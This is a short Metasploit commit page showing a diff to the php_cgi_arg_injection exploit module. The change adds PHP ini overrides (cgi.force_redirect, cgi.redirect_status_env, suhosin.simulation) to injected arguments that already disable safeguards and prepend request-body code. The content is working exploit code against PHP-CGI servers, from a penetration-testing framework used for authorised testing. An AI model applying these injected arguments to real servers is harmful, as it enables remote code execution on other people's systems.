Land rapid7#7929, improve php_cgi_arg_injection

egypt · egypt · commit 026f6eb715f5 · 2017-02-10T10:01:38.000-06:00
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -114,6 +114,9 @@ def exploit
         create_arg("-d",'disable_functions=""'),
         create_arg("-d","open_basedir=none"),
         create_arg("-d","auto_prepend_file=php://input"),
+        create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
+        create_arg("-d", "cgi.redirect_status_env=0"),
+        create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
         rand_opt_equiv("-n")
       ]
 

Original file line number	Diff line number	Diff line change
`@@ -114,6 +114,9 @@ def exploit`
`114`	`114`	`create_arg("-d",'disable_functions=""'),`
`115`	`115`	`create_arg("-d","open_basedir=none"),`
`116`	`116`	`create_arg("-d","auto_prepend_file=php://input"),`
	`117`	`+ create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),`
	`118`	`+ create_arg("-d", "cgi.redirect_status_env=0"),`
	`119`	`+ create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),`
`117`	`120`	`rand_opt_equiv("-n")`
`118`	`121`	`]`
`119`	`122`